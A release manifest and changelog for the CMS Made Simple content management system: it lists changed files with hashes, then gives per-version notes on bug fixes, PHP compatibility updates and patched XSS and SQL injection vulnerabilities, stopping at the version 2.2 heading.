CHANGED :: 4b75f1ef521ebd62e1e6c1f87c8e2f72 :: lib\plugins\modifier.cms_escape.php
CHANGED :: 1d277cf8a959a35ac6dadc6fe4dfddbb :: lib\smarty\Autoloader.php
CHANGED :: fcd8eaf21157fc793206435be474484b :: lib\smarty\bootstrap.php
CHANGED :: 2ea3b6234de71d5b648d2e21e67ea78f :: lib\smarty\debug.tpl
CHANGED :: 76670320b43c8e82591428e2fd63e41b :: lib\smarty\plugins\function.math.php
CHANGED :: 8a84ac6672b3ba98fcee78b6666df968 :: lib\smarty\plugins\modifier.capitalize.php
CHANGED :: 99ccb65523261f824cbb6e787db7d0d0 :: lib\smarty\plugins\modifier.date_format.php
CHANGED :: 95b84e57e760fbe71205e8e1acbc58b6 :: lib\smarty\plugins\modifier.escape.php
CHANGED :: 02a922991bf711f7ee31f32b25a38b91 :: lib\smarty\plugins\modifier.truncate.php
CHANGED :: 6eeecb8ce3b81ef16d7921f01de9c6c9 :: lib\smarty\plugins\modifiercompiler.count_characters.php
CHANGED :: edaf00578802057f8809ee5da4d6ef6e :: lib\smarty\plugins\modifiercompiler.count_words.php
CHANGED :: b0a2876eedb9ce70b2c5743524f5a059 :: lib\smarty\plugins\modifiercompiler.escape.php
CHANGED :: f04f200dbbc1fc6f0b6ed02b8a4eaefa :: lib\smarty\plugins\modifiercompiler.lower.php
CHANGED :: 0f9a52863c152b689232698ff4a5dc43 :: lib\smarty\plugins\modifiercompiler.strip_tags.php
CHANGED :: 1f25638e34c76ef942836145c664f31f :: lib\smarty\plugins\modifiercompiler.unescape.php
CHANGED :: 1b8db63b91f40d2c3fb02df92de0f12c :: lib\smarty\plugins\modifiercompiler.upper.php
CHANGED :: abbe074ab4b042b22cf8ca5db00ce77e :: lib\smarty\plugins\outputfilter.trimwhitespace.php
CHANGED :: 647033fcba76d4ba47184d9928cf2517 :: lib\smarty\plugins\shared.escape_special_chars.php
CHANGED :: ef02b97802fbfb5e616bc75444059060 :: lib\smarty\plugins\variablefilter.htmlspecialchars.php
CHANGED :: 16a033e479e2276d3debdda81d6a61ea :: lib\smarty\Smarty.class.php
CHANGED :: 13f60fc544e77bcaf242e3c8e8aa73ac :: lib\smarty\sysplugins\smartycompilerexception.php
CHANGED :: e1937ad4791bdae5dfe82271f0af0fae :: lib\smarty\sysplugins\smarty_cacheresource.php
CHANGED :: 1cda2206fd50ba6910ecd6d0f516466a :: lib\smarty\sysplugins\smarty_cacheresource_keyvaluestore.php
CHANGED :: 6fcca2c82b907e0dca94c28b8f1479e4 :: lib\smarty\sysplugins\smarty_internal_compile_private_foreachsection.php
CHANGED :: def7d969260d6a5053a78b76697d7872 :: lib\smarty\sysplugins\smarty_internal_compile_private_modifier.php
CHANGED :: e2689193549ba8fc064c8b473151c783 :: lib\smarty\sysplugins\smarty_internal_compile_private_print_expression.php
CHANGED :: b2673d0a81bd2dbbceb3dd9cad600b2b :: lib\smarty\sysplugins\smarty_internal_compile_private_special_variable.php
CHANGED :: 0117610e68c61a5c084d30e003b3af45 :: lib\smarty\sysplugins\smarty_internal_debug.php
CHANGED :: 2178c776a06121e9fa447729e38640e9 :: lib\smarty\sysplugins\smarty_internal_errorhandler.php
CHANGED :: 89653576478821b38a7fd4d1c4dec88d :: lib\smarty\sysplugins\smarty_internal_extension_handler.php
CHANGED :: 1c079722d24b45d86461786cd1bc8acf :: lib\smarty\sysplugins\smarty_internal_method_loadplugin.php
CHANGED :: ee598b1e9ed44251cd410dfdb8f3b815 :: lib\smarty\sysplugins\smarty_internal_method_mustcompile.php
CHANGED :: 12f639194c4c710645b20054eb620cdb :: lib\smarty\sysplugins\smarty_internal_runtime_make_nocache.php
CHANGED :: c719a11d48eefd410121df6f2db5a6fe :: lib\smarty\sysplugins\smarty_internal_runtime_writefile.php
CHANGED :: 738953809a124478e2a0753054a75d2a :: lib\smarty\sysplugins\smarty_internal_template.php
CHANGED :: 5c2ad5b7823ecc0f3949e54b5f03a700 :: lib\smarty\sysplugins\smarty_internal_templatebase.php
CHANGED :: 5eec92918d15fb83dadc464842fcc135 :: lib\smarty\sysplugins\smarty_internal_templatecompilerbase.php
CHANGED :: 9f6dada09f2f9f49adcdb60f407cc458 :: lib\smarty\sysplugins\smarty_internal_templateparser.php
CHANGED :: 98d72f3b7738d0ea6a9ad1b34da1583c :: lib\smarty\sysplugins\smarty_internal_testinstall.php
CHANGED :: 41ef30edafda40f08788eee487ce11fd :: lib\smarty\sysplugins\smarty_resource.php
CHANGED :: 18f1a684c833f59f4ea8f7137396c857 :: lib\smarty\sysplugins\smarty_resource_custom.php
CHANGED :: 2fa1e0ed5a959eb0aad2af7bcfdfdaed :: lib\smarty\sysplugins\smarty_security.php
CHANGED :: ec5fc543938c780749b58829525d3fd3 :: lib\smarty\sysplugins\smarty_template_compiled.php
CHANGED :: 6556e27b09c593e2a1dc008e68de07cf :: lib\smarty\sysplugins\smarty_variable.php
CHANGED :: c6a0c8bc6d9ba2aebdc73b5d0a01f767 :: lib\tasks\class.ClearCache.task.php
CHANGED :: 7aff05eecc1c4fa4bacc01866934ddf6 :: lib\tasks\class.PruneAdminlog.task.php
CHANGED :: 632a0dcc267e445813745df5242c16d3 :: lib\tasks\class.ReduceAdminlog.task.php
CHANGED :: 9d0d770ee83b6bc3a950e9b30638aa43 :: lib\version.php
CHANGED :: 1f21b1a9ed5008d1317bfb5ca55eae02 :: modules\CMSContentManager\CMSContentManager.module.php
CHANGED :: 0307bb54bf735a7d054218b45d901b7e :: modules\CMSContentManager\templates\admin_editcontent.tpl
CHANGED :: 90e6f59190e46bc117b084a5d01e3131 :: modules\CmsJobManager\CmsJobManager.module.php
CHANGED :: 88f1c504ef8012590b1558d24a5074fa :: modules\DesignManager\DesignManager.module.php
CHANGED :: 6bc1070c646f8270ed445524c966f086 :: modules\DesignManager\lang\ext\de_DE.php
CHANGED :: f0bbd9f7a80ab3dac929f1a82b19c56b :: modules\DesignManager\lib\class.dm_reader_base.php
CHANGED :: d0c7be28585c99ac3f9faf8e5b221997 :: modules\FilePicker\action.filepicker.php
CHANGED :: f1e551fad9e7f78fefe722242d3b8494 :: modules\FilePicker\FilePicker.module.php
CHANGED :: de7d5f155d7801291a61d670ac8bc526 :: modules\MicroTiny\lib\class.microtiny_profile.php
CHANGED :: 40de539df339ce358a3cd81cc37f8508 :: modules\MicroTiny\lib\class.microtiny_utils.php
CHANGED :: 0d33f51e144747f720ef2eeae1db1055 :: modules\MicroTiny\MicroTiny.module.php
CHANGED :: 85191bdf2c719beae1c530064a720eb7 :: modules\MicroTiny\templates\tinymce_config.js
CHANGED :: c818ad31e4ef1fb734208e41bd9aa842 :: modules\ModuleManager\action.defaultadmin.php
CHANGED :: 8381fbf5d476dbd85445de0d7c9ff325 :: modules\Navigator\Navigator.module.php
CHANGED :: 9334d8fae2a40e5c34387a1be00fce3a :: modules\News\lib\class.DraftMessageAlert.php
CHANGED :: b55af3285d0a6e271ed61e6ef7aca539 :: modules\News\News.module.php
CHANGED :: e9b00882b663531d2c2ea413a4aad080 :: modules\Search\lang\ext\sv_SE.php
Version 2.2.21 - Sherbrooke
-------------------------------

Core - General
 - Fixes BR 12714 inherited content Fields from a base templates are missing in child templates (backend edit);
 - Fixes BR 12713 Pages extended of a page base can't be edited, if they don't contain a {content} tag;
 - Fixes a typo in class ErrorPage: missing line break after #[\AllowDynamicProperties] directive;


 Version 2.2.20 - Saguenay
-------------------------------

Core - General
 - Compatibility fixes for PHP 8.2 and 8.3;
 - Smarty upgraded to version 4.5.2 (latest of the stable 4.5.x branch);
 - Made some changes to keep backward compatibility with previous versions of Smarty;
 - Fixed BR #12683: we now truncate the item_name at 50 characters;
 - Moved php files with functions to a specific folder tidying up for further changes;
 - Deprecated cms_html_entity_decode: scheduled to be removed; PHP native html_entity_decode now supports UTF-8 properly;
 - Fixed BRs #12677 and #12703: UDTs errors are now handled more gracefully - the error being triggered is shown on the popup;
 - News module is no longer mandatory;
 - New module added to core (UserGuide);
 - Installer now supports optional modules (News and UserGuide);
 - MenuManager is no longer installed back on upgrades;
 
Content Manager 1.1.13
 - Fixed a typo in admin_editcontent.tpl;
 
CmsJobManager 1.0.0
 - Considered a stable release, version is now 1.0.0;
 - Compatibility fixes for PHP 8.2 and 8.3;
 
DesignManager 1.1.11
 - Compatibility fixes for PHP 8.2 and 8.3;
 
FilePicker 1.0.8
 - BR #12671 - fix FilePicker prefix error;
  
MicroTiny 1.6.5
 - Compatibility fixes for PHP 8.2 and 8.3;
 - Removed mt_jsbool as it is not needed any longer and was breaking Smarty compatibility; 
 
Navigator 1.0.11
 - Compatibility fixes for PHP 8.2 and 8.3;

News 2.51.13
 - Compatibility fixes for PHP 8.2 and 8.3;
 - News is now an optional module, no longer installed by default;
 
UserGuide 1.0.0
 - Initial release;
 
Phar Installer Not SET
 - Compatibility fixes for PHP 8.2 and 8.3;
 - Supports core optional modules selection on advanced mode (currently News and UserGuide);
 - Modified Smarty 4.2.1 enough to work with PHP 8.3;
 - Regular Phar doesn't support Windows at this point while Expanded Phar does; 


Version 2.2.19 - Selkirk
-------------------------------

Core - General
 - BR #12647 - Wrong default action value in get_pageid_or_alias_from_url;
 - FR #12638 - ability to add CSP headers on the backend: currently weak restrictions: self with script-src and script-src-elem set to unsafe-inline (optionally set on config admin_csp_header);
 - BR #12661 - fix page_selector allow_all parameter and set default to false;
 
Content Manager 1.1.12
 - BR #12635 - Apply button is shown for non-existing page;
 - BR #12474 Taking the default page down by accident through the content type;

File Manager 1.6.16
 - BR #12659 - FileManager upload Warning bug fix;

FilePicker 1.0.7
 - BR #12621 - FilePicker upload bug;
 - BR #12659 - FilePicker upload Warning bug fix;

Navigator 1.0.10
 - BR #12528 Navigator call doesn't clear excluded prefixes in some situations

Version 2.2.18 - Apex
-------------------------------
Core - General
 - Fallback function CMSMS\strftime. PHP Intl extension still recommended. The fallback solves issues on hosts that don't install it by default and don't allow users to install it.

Version 2.2.17 - Iqaluit
-------------------------------
Core - General
 - BR #12529 - Cacheable Pages have Bad Header Last-Modified;
 - BR #12543 - Lib file corrections;
 - BR #12618 - HasChildren() is broken;
 - BR #12587 - can't uninstall modules;
 - Compatibility fixes for PHP 7, 8.0 and 8.1;
 - Smarty upgraded to version 4.2.1;
    Note: Smarty 2 syntax is still supported, but deprecated
 - Add function CMSMS\strftime to replace deprecated PHP function. PHP Intl extension recommended to support this.
 - Enabled use of PHP functions trim,ltrim,rtrim in smarty templates
 - PHPMailer upgraded to version 6.6.0.
 - fixes BR #12529 Cacheable Pages have Bad Header Last-Modified;
 - added module's support for arrays in parameters;
 - Fixes to cms_mailer class mainly in terms of proxy design pattern getters and setters and autotls settings;
 - Smarty security policies changes: due to some modifications in the way updated Smarty now behaves, all static classes need to be registered for its use to be allowed in templates.

Content Manager 1.1.10
 - Differentiate new page from cloned page.
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

Design Manager 1.1.10
 - BR #12545 - Module: DesignManager typo info on top file.
 - fixes typo BR #12545
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

FilePicker 1.0.6
 - BR #12539 - Module FilePicker 1.0.5 files corrections.
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

Module Manager 2.1.9
 - BR #12541 - Module ModuleManager 2.1.8 : corrections + compatible php 7.1.0 to 8.1.4.

News 2.51.12
 - BR #12543 - Lib file corrections.
 - Compatibility fixes for PHP 7, 8.0 and 8.1.

FileManager 1.6.13
- Compatibility fixes for PHP 7, 8.0 and 8.1.


Version 2.2.16 - Truro
-------------------------------
Core - General
  - BR #12370 - Admin Log-Download : now downloading the log honors all filters but doesn't process paging.
  - BR #12437 - Installer won't allow "<" symbol in database password.
  - BR #12457 - Event Manager empty list when mysql mode only_full_group_by.
  - BR #12484 - Cannot exit after Run UDT.
  - BR #12495 - MySQL 8.0.2+ breaks groups without table prefix.
  - BR #12499 - adminlog.tpl Wrongly formed date.
  - BR #12500 - NameQuote function does not work properly.
  - BR #12504 - Function call notification.
  - Fixed an issue with specific characters in a content block tab name breaking the editor.
  - Adjust regex's incompatible with PCRE2.
  - Avoid deprecated strftime() - deploy new replacement function locale_ftime() and new modifier-plugin localedate_format.
  - A number of fixes for PHP 8 compatibility.

Admin Search v1.0.6
  - BR #12443 - Admin Search fails on some searches with default mysql mode only_full_group_by (mysql 5.7.5+).
  - Removed license and copyright notices from module help text.
  - Escaping the search input field values.
  - More content object attributes are searched.
  - User Defined Tags can be searched.
  - Only places a user has permission to search are shown in the filter list (cached!).

Content Manager v1.1.9
  - Fix menu text/title setting.

FileManager v1.6.12
  - BR #12435 - Replacing an image file in filepicker doesn't update thumbnail.

FilePicker v1.0.5
  - FR #12483 - Additional FilePicker Help for usage as Content Block.

Navigator v1.0.9
  - BR #12456 - Navigator breadcrumbs with default page hidden from menu causes PHP notice.

Search v1.53
  - Added 'Manage Search' permission.
  - BR #12391 - Core search issue page/entry titles that start with numbers.
  
Phar Installer v1.3.15
  - Fixed BR #12437 - Installer won't allow "<" symbol in database password.
  - Added Russian lang file to installer.
  - use locale_ftime() instead of deprecated strftime().
  - escape name of groups table, to prevent reserved-word conflict when table-prefix is empty.
  - alterations to the links in final step: we now privilege links to CMSMS channels of contact and support.


Version 2.2.15 - Bonaventure
-------------------------------
Core - General
  - BR #12287 - Admin shortcuts popup refers to IRC.
  - BR #12292 - showbase parameter of metadata tag doesn't accept boolean value.
  - BR #12303 - No date displayed in the admin + category id not incremented.
  - BR #12305 - Removing actual Destination Page breaks Destination Page dropdown in Internal Page Link pages.
  - BR #12311 - log_performance_info - undefined variable: queries.
  - BR #12313 - 5 Stored XSS vulnerabilities in Settings - Content Manager.
  - BR #12317 - XSS on Settings News Module.
  - BR #12325 - Several XSS vulnerabilities.
  - BR #12335 - User pref admin homepage not properly displayed under certain conditions.
  - BR #12337 - GetContentBlockFieldInput $adding always false.
  - BR #12338 - Allow http/2 responses.
  - BR #12357 - Filepicker dropzone size issue.
  - FR #12345 - More user friendly admin session handling (partly implemented).
  - FR #12349 - Swap tabs on System Maintenance page.
  - Browsing to the main admin page in a new browser tab during a running session won't redirect to login form anymore.
  - (Error) messages in OneEleven won't dismiss on click.
  - Fix to Admin redirection after login on Windows platform.
  - Fix to the module API redirection to support arrays in parameters.

FileManager v1.6.12
  - Dropzone improvement like core FilePicker.

FilePicker v1.0.5
  - BR #11673 - FilePicker will not show svg images, when in the Content Manager.
  - BR #12312 - Stored XSS vulnerability in File Picker.

News v2.51.11
  - Minor code fix to encoding title content.
  - BR #12322 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - BR #12325 - Several XSS vulnerabilities.

Design Manager v1.1.9
  - Minor fixes for PHP warnings\notices.

Module Manager v2.1.8
  - BR #12291 - Reflected Cross site scripting.
  - BR #12324 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - Increased the Download Chunk Size field size to 4.

MicroTiny v2.2.5
  - BR #12351 - Escaping translation strings in tinymce_config.js.

Search v1.52
  - FR #11886 - Include module and modulerecord fields for content pages.

Phar Installer v1.3.13
  - Fixes to the reload button: now prevents browser's caching.
  - BR #11591 - fixed: Phar installer doesn't work with OPCache enabled.


Version 2.2.14 - T'Sou-ke
-------------------------------
Core - General
  - BR #12280 - Add Shortcut from Shortcuts modal broken.
  - Fixes to the class.CmsAdminThemeBase.php regarding main sections title and breadcrumbs generation.
  - Explicitly add function_exists and getimagesize functions to the allowed functions in PHP secure mode.
  - Improved Error Console template.
  - Site Prefs, remove submit confirmation.
  - System Maintenance, remove confirmation update page hierarchy positions and routes.
  - cms_http_request PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".
  - Backend users, fixed the bulk actions.
  - BR #12172 - CronJobTrait undefined constants.
  - BR #12227 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.
  - BR #12272 - Internal page link - selecting destination page problem.

AdminSearch v1.0.5
  - Remove click thru warning.

CMSContentManager v1.1.9
  - Fix notices in edit content template.
  - Fix notice in default admin view.

DesignManager v1.1.8
  - BR #12225 - Reflected Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

FileManager v1.6.11
  - Don’t disable advanced mode on upgrade.
  - Fix adding double // in site root link.
  - BR #12215 - FileManager 1.6.10 crashes when trying to rename a file.
  - BR #12224 - Reflected Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

News v2.51.9
  - Minor code fix.
  - Alert on unapproved articles disabled by default. Enable at Settings >> Options tab.
  - BR #12207 - Can't display image in news when using upload field.
  - BR #12228 - Stored Cross-Site Scripting. Minor, because it can only be performed by a person that has access rights to the Admin panel.

Phar Installer v1.3.9
  - PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".
  - PHP 7.4 fix "Function get_magic_quotes_runtime() is deprecated".

Search v1.51.8
  - PHP 7.4 fix "Array and string offset access syntax with curly braces is deprecated".


Version 2.2.13 - Moosomin
-------------------------------
Core - General
   - Explicitly add a function or two to the allowed functions in PHP secure mode.

DesignManager v1.1.7
   - Fix a warning in PHP 7.3+.

FileManager v1.6.10
   - Fix minor XSS vulnerabilities in FileManager.

News v2.51.8
   - Fix a security issue in the default action with the idlist param.
   (This version was also separately released in the forge).


Version 2.2.12 - Osoyoos
-------------------------------
NOTICE: Due to the nature of the security issue fixed in FileManager after upgrading you should change your database password.

Core - General
  - Fix warning in cms_html_entity_decode.

FileManager v1.6.9.1
  - Security fixes for view action.


Version 2.2.11 - Vulcan
-------------------------------
Core - General
  - Fix minor bug in copying content objects.
  - Minor fix to array indexes when filling params in ContentBase.
  - Fix to the {cms_filepicker} plugin.
  - Minor fix to the 'my account' form.
  - Fix error in cmsms_filepicker.js encountered in LISE.
  - PHP 7.3 fix to DataDictionary::RenameColumnSQL.

CMSContentManager v1.1.8
  - Fix an issue with copying non-core content objects.
  - Minor fixes for php 7.3.

ModuleManager v2.1.7
  - Minor exception handling improvements.
  - Minor improvement to dependency detection with modules that do not exist in ModuleRepository.
  - Minor fixes for php 7.3.

News v2.51.6
  - Minor improvements for CMSMS v2.3 compatibility.

Phar Installer v1.3.8
  - Minor change to use include() instead of include_once()... not sure why.

FilePicker v1.0.4.1
  - Fix type error.

Search v1.51.7
  - Minor fixes for php 7.3.


Version 2.2.10 - Spuzzum
-------------------------------
Core - General
  - Fix minor potential authenticated object insertion vulnerability in changegroupperm.
  - Fix minor potential uncleaned input vulnerability in siteprefs.
  - Minor improvement to get_real_ip().
  - Fix to clearing cache in cms_filecache_driver.

News v2.51.5
  - Fix unauthenticated SQL injection vulnerability with the default action.

ModuleManager v2.1.6
  - Fix authenticated object insertion vulnerability in the installmodule action.
  - Improve ordering of the dependencies before installing or upgrading modules.
  - Adds more auditing, particularly in the cached request stuff.

FilePicker v1.0.4
  - Fix authenticated object insertion vulnerability.


Version 2.2.9.1
-------------------------------
Core - General
  - fix to the CmsLayoutStylesheetQuery class.
  - fix an edge case in the Database\Connection::DbTimeStamp() method.

MicroTiny v2.2.4
  - Minor fix in error displays.

Phar Installer v1.3.7
  - Fix to edge case in step 3 where memory_limit is set to -1.


Version 2.2.9 - Blow Me Down
-------------------------------
Core - General
  - PHP 7.2+ fixes.
  - Now do not call Module::InitializeAdmin() or Module::InitializeFrontend() if the module loading is being forced
    (as is the case sometimes within ModuleManager);
  - Minor changes and fixes to prevent warnings/notices in CLI based scripts.
  - Improvements to the {browser_lang} plugin.
  - Fixes a bug in the CmsLayoutTemplateQuery class.
  - Fixes a bug with the name= parameter in the {cms_stylesheet} plugin.
  - Fixes a minor issue in system information (smarty compilecheck).
  - Fixes a minor issue with the tabIndex and accesskey fields in edit content.
  - Fixes issue in the CmsLayoutStylesheet class related to associating designs with new stylesheets.
  - Now check for an english language file first in module_custom/xxxxx/lang before a file for the current language.
  - Prevent false-positive hit for "multiple_webshells_0018" rule webserver virusscanner (https://github.com/Yara-Rules/rules/blob/master/Webshells/WShell_THOR_Webshells.yar#L4764).
  - Fixes a bug in ContentOperations::LoadAllContent() if the content list had a custom content type from a module that was unvavailable.
  - Fixes a bug in the Database\Connection::DbTimeStamp().

Search v1.51.6
  - Minor fixes to help.

MicroTiny v2.2.3
  - More entropy in the mt_config.js filename to fix issues with js caching when switching users.
  - Fixes in the cms_linker plugin for when trying to change a link to a CMSMS page where the alias has changed.

FileManager v1.6.8
  - Fixes an upload issue.

ModuleManager v2.1.5
  - PHP 7.2+ fixes.

CMSContentManager v1.1.7
  - Fixes an issue with changing content type after copying a content page.

DesignManager v1.1.5
  - Fixes ownership issue on templates with importing a design.

Phar Installer v1.3.7
  - Minof fix to detect when PHP's memory limit is set to -1.


Version 2.2.8 - Flin Flon
----------------------------------
Core - General
  - Re-introduce the host_whitelist config entry that got lost in some commit somewhere.
  - Minor fix to pagination in Admin log.
  - Change Finnish locale priorities so that UTF-8 is first.
  - Minor fix to calling hooks with a single associative array parameter.
  - Adds new HookManager::do_hook_first_result() method.
  - cangegroupperms now calls HookManager::do_hook_first_result.
  - Minor enhancement to moduleoperations::_load_module() to check if the class exists.
  - Minor enhancement to {cms_action_url} wrt. the page to link to if not specified.
  - Deprecate CMSModule::SetParameterType and CMSModule::CreateParameter methods.
  - Deprecate ModuleOperations::GetModuleParameters() method.
  - CMSModule::RestrictUnknownParameters() now does nothing.
  - No longer warn if a module is sent a parameter that is not registered.
  Note: modules should now be cleaning parameters directly (see filter_var) from $_POST and $_REQUEST ($_GET is automatically cleaned).
  Note: In the future,  $params in module actions will only consist of parameters passed on the module tag.
  - PHP 7.2+ fixes.
  - Fix the inactive param in the page_attr plugin.

FilePicker v1.0.3
  - Minor fix to delete action.

Search v1.51.5
  - Now enforce utf-8 on preg_split.
  - Minor parameter check.
  - Removed deprecated each() function.

CMSJobManager v0.1.3
  - Notices fixed.
  - PHP 7.2+ fixes.

FileManager v1.6.7
  - Remove un-necessary files that may cause a security vulnerability.
  - prevent creating directories with leading or trailing whitespace in the name.

Module Manager v2.1.4
  - PHP 7.2+ fixes.

Navigator v1.0.9
  - Template fix simple_navigation.tpl. Output correct class for parent without active children.

News v2.51.4
  - Notices fixed.


Version 2.2.7 - Skookumchuck
----------------------------------
Core - General
  - Change internal CSRF variable name.
  - Fix object insertion bug via deserialize in LoginOperations.
  - Fix issue where login cookie contents could be forged by determining the hashing salt.
  - Refactor the mechanism for generating and verifying admin account password reset codes.

FileManager v1.6.6
  - No longer allow uploading files with names that end in .

FilePicker v1.0.2
  - No longer allow uploading files with names that end in .

Search v1.51.4
  - Minor fix to microtime calls.


Version 2.2.6 - Come by Chance
----------------------------------
Core - General
  - Fixes to AdminAlerts::load_by_name().
  - SetMessage() and SetError() in the module API now use session variables.
  - Remove support for module_error and module_action request parameters in admin module actions.
  - Add call to check_login() in admin actions that were missing them.

Search v1.51.3
  - Fix notice in PHP 7.1: A non well formed numeric value encountered...


Version 2.2.5 - Wawa
----------------------------------
Core - General
  - Fix minor security issue in the way login information was cached in cookies and the session.
  - Simplify rules around alias editing/generation in fillparams.
    If the alias field exists then we can adjust its value or recalculate an alias.
    Use basic properties, and ownership and permissions to determine if that field exists on the edit form.
  - Minor fixes to the CmsJobManager.


Version 2.2.4 - Little Paradise
----------------------------------
Core - General
  - Improvements to the Hook class.
  - Minor fix to usertagoperations.
  - Changes to the hierarchy selector to disallow circular references.
  - Fix problems with additional editors causing page aliases to be regenerated.
  - Minor fixes to Admin log browser.
  - Minor fixes to Admin login.
  - Add missing call Core::LoginPre hook.
  - Modify myaccount.php to call Core::EditUserPre hook BEFORE the password is set.
  - Fix documentation to CallUserTag.
  - Fix to default handling for content_image block.
  - Improve the help for the {page_attr} plugin.
  - Fix a potential warning in the {anchor} tag.
  - Fix boolean comparison in LoginOperations.

Installation Assistant v1.3.4
  - Fixes endless recursion issue with setting a tmpdir.
  - Fix issue with requiring a database prefix on upgrade.

FilePicker v1.0.2
  - Now allow specifying a 'useprefix' boolean parameter to the action url which will use the current top directory.
  - Add a prefix on all returned strings.
  - Slight modification to the profile class.
  - Now sends the FileManager::OnFileUploaded hook the same way as FileManager does.
  - Adds an exception handler around the change working directory stuff.

FileManager v1.6.5
  - Change upload action to call FileManager::OnFileUploaded hook before creating the thumbnail to allow a hook to rename the uploaded file.
  - Now enable creation of thumbnails on install.

MicroTiny v2.2.2
  - Minor fix for the filepicker if using a default filepicker profile that specifies a top directory.
  - Re-adds the table plugin (went missing when we upgraded tinymce).

ModuleManager v2.1.3
  - Adds audit line displaying status if cannot connect to ModuleRepository.

DesignManager v1.1.4
  - Fixes problems with the cancel button not marking the form as 'clean' (not dirty).


Version 2.2.3.1 - Happy Adventure
----------------------------------
Core - General
  - Fix an issue when parsing multiple content blocks.


Version 2.2.3 - Happy Adventure
----------------------------------
Core - General
  - Fixed a redirect loop problem on mixed HTTP/HTTPS sites when the secure flag was set on some pages.
  - Fixed a problem with prefilters and postfilters not working if placed in /assets/plugins.
  - Now use our own derivative of Smarty Internal Template so that we can send hooks, etc.
  - Improved error message if there was an error parsing the template (or a duplicate content block).
  - Fixes content blocks, image blocks, module blocks containing whitespace in the name.
  - Minor fix to {cms_filepicker} plugin.
  - Improve the CmsModuleInfo class such that if the module class file is newer it will be loaded.
  - Now generate the moduleinfo.ini file automatically on install or upgrade of a module.
  - Increase the maxlength attribute for password input boxes in myaccount.
  - Adds a StartsWith JavaScript shiv for IE11.
  - Revert the protocol-less URI for root_url (more changes coming for 2.3).
  - Get rid of the smart_url config option.
  - Fix a problem when testing for duplicate aliases of the form string-###  where the suffix integer was greater than 100.
  - More fixes to mact preprocessing if {content} was in the top of the template.
  - Minor fix to ExpandXMLPackage to not throw an exception in brief mode if module is not compatible with the current version of CMSMS.
  - adds new cms_entities_array function in misc to convert an array recursively to values.
  - Fixes transposed arguments in UserOperations::AddMemberGroup().
  - Better detection of duplicate content blocks.
  - Revert template_stack change to Smarty_CMS from 2.2.2.
  - Improvements to HookManager.

CmsJobManager v0.1.1
  - Optimization of audit logging.
  - Change connection timeout to 1 second.
  - Change processing to be a little more friendly to some environments wrt. content-size header.
  - Prevent processing from the CLI when root_url is calculated.

MicroTiny v2.2.1
  - Minor fix for filepicker plugin.

News v2.51.3
  - For security, no longer urldecode the detailtemplate parameter in detail view.
    This may have some implications for people that are specifying the detailtemplate parameter (with a template with special characters) from within a WYSIWYG (which is not recommended behavior).
  - Convert title and dropdown options and text fields to entities before display.

ModuleManager v2.1.2
  - Now sort modules in the installed tab a bit better.
  - Now handle module 'not available' a bit better.

FileManager v1.6.4
  - Add a different icon for navigating up one level.
  - No longer allow uploading any php (or derivative) file.
  - No longer allow renaming any file to have a .php extension (or a derivative).
  - Fixes an issue when improper/invalid values for root path and uploads path are manually specified in the config.php

FilePicker v1.0.1
  - No longer allow overriding the filepicker type on the URL.
  - No longer allow uploading any .php files.

CMSContentmanager v1.1.6
  - Now double check that the 'default parent' for new pages actually exists.

Navigator v1.0.8
  - Minor english documentation correction.

Installation Assistant v1.3.3
  - Now look for lib/include.php before include.php in step 8 and step 9 when connecting to CMSMS.
  - Fixes to upgrade routine for 2.1.5 wrt. the 'Manage Stylesheets' permission (ignore an exception).


Version 2.2.2 - Hearts Content
----------------------------------
Core - General
 - Additional security improvement in CMSModule::GetTemplateResource().
 - Now Smarty_CMS is no longer derived from SmartyBC (uses our own wrapper class) which prevents all occurrences of {php} tags from running.
 - Adds an admin directory .htaccess file to explicitly disable browser caching of any resources.
 - Fixes a relative path vulnerability in module_file_tpl resource.
 - Fixes a path building issue in CmsModuleInfo.
 - Fixes to parsing and generating moduleinfo.ini files.
 - Disallow any resource specifications with a * or a /.
     * This also means that no file resource specifications with path information will be permitted.
 - Move mact preprocessing to AFTER the template_top has been processed. So order of processing (for module actions on the frontend is)
     a:  template top
     b:  mact preprocessing (if enabled, which is the default)
     c:  template body
     d:  template head
 - Fix sureGetNodeByAlias to check if the input is numeric. If it is, assume that it is a page id, not an alias.
 - Fix alias generation in the ContentBase class to check if the input page title is numeric... If it is, prepend a character to it to ensure that integer casting will return 0.
 - Fix listtags to show tags using smarty_nocache_ function name prefix.
 - Improvements to the {form_start} plugin.
 - Fix silly, old issue in recursive_delete function.
 - Clean up more parameters from the content tag before passing to module action.
 - Fix local file inclusion vulnerability in listtags.
 - Now call get_userid() in debug_to_log instead of check_login()

AdminSearch v1.0.3
 - Now search the metadata field of content pages.
 - Fixes for single quotes in search results.

DesignManager v1.1.3
 - Set title attribute tags for edit/create template, stylesheet, design.
 - Remove debug statements.

MicroTiny v2.2
 - Upgrade tinymce to v4.6.x.
 - Adds new tabfocus and hr plugins.

News v2.51.2
 - Fixes so that all cancel buttons work properly on new News articles.

Navigator v1.0.7
 - Adds a silly __get() method to the NavigatorNode class squash some notifications in the error logs.

ModuleManager v2.1.1
 - Now handlle remote module installs upgrades, and activates via a 2 request process to allow new module versions to be read into memory.

Installation Assistant v1.3.2
 - Correction to assets warning

Search v1.51.2
 - Now do an html entity decode on all content added to AddWords.


Version 2.2.1 - Hearts Desire
----------------------------------
Core - General
 - Improve the Smarty plugin loading to handle non-cachable plugins in the /assets/plugins and /plugins directories.
 - Fixes to transaction functions in database abstraction library.
 - Fix CMSModule::GetTemplateResource to no longer accept eval or string resources.
 - Fix CMSSmartySecurityPolicy so that debug_to_log is no longer an allowed function.

   Many thanks to Daniel Le Gall from SCRT SA, Switzerland for reporting the vulnerabilities.

Installation Assistant v1.3.1
 - On upgrade to 2.2.1 move all files from /plugins to /assets/plugins (they should only be third party plugins at this point).
 - On upgrade chmod the config.php to 444.

MicroTiny v2.1.1
 - Fix temporary JS call URL.

News v2.51.1
 - Fix frontend pagination.


Version 2.2 - Canada
----------------------------------
Core - General
